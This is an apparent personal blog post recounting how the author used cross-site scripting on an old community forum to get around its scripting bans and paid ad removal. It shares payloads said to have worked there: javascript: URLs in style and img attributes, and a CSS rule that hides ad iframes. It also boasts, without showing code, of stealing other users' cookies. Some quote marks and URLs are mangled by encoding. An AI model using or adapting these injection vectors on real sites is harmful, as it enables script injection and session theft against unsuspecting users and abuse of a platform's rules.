XSS Magic

So I used to be a part of this community forum before Facebook was around and everyone had their own profile pages, the problem was they were boring. The code you were allowed to use was heavily restricted so no Flash or Javascript was allowed, not even mouseover images!.

There was also banner ads at the top of the pages and you had to pay to have them removed. They interfered with the look of your page when you customized them with CSS.

Well, I wasn’t having any of this. I planned on bypassing every restriction imposed, and I did just that using XSS. I also used XSS to steal cookies of users on the forums and get around other restrictions. Here’s some old code I found that I used on the site successfully.

<!–BANNER KILLER–>
<STYLE type=text/css>
IFRAME {
VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px
}
</STYLE>
<!–BANNER KILLER–>

 

<!–<hr style=`background:url(javascript:alert(‘who’);alert(‘said’);alert(‘they’);alert(‘disabled’);alert(‘Javascript :P’))`>–>

 

<div align=”center”><img src=”Javascript:void(window.defaultStatus = ‘Thanks for Visiting’)” width=”1″ height=”1″ align=”middle”>

 

<IMG SRC=”javascript:alert(‘Wellcome to the site!)” width=”1″ height=”1″ align=”middle”>

 

CSS
Code:

.MouseOvr {
width:75px;
height:32px;
background: url(“”);
display:block;
}
.MouseOvr :link,
.MouseOvr :visited {
width:75px;
height:32px;
background: url(“”);
display:block;
}
.MouseOvr a:hover {
width:75px;
height:32px;
background: url(“http://www.google.ca/intl/en_ca/images/logo.gif&#8221;);
display:block;
}
.MouseOvr a:hover span {
visibility: hidden;
}

HTML: Add this anywhere in your page you want the link
Code:

<h1 class=”MouseOvr”>
<a href=”http://google.ca”&gt;
<span>Link</span>
</a>
</h1>

Advertisements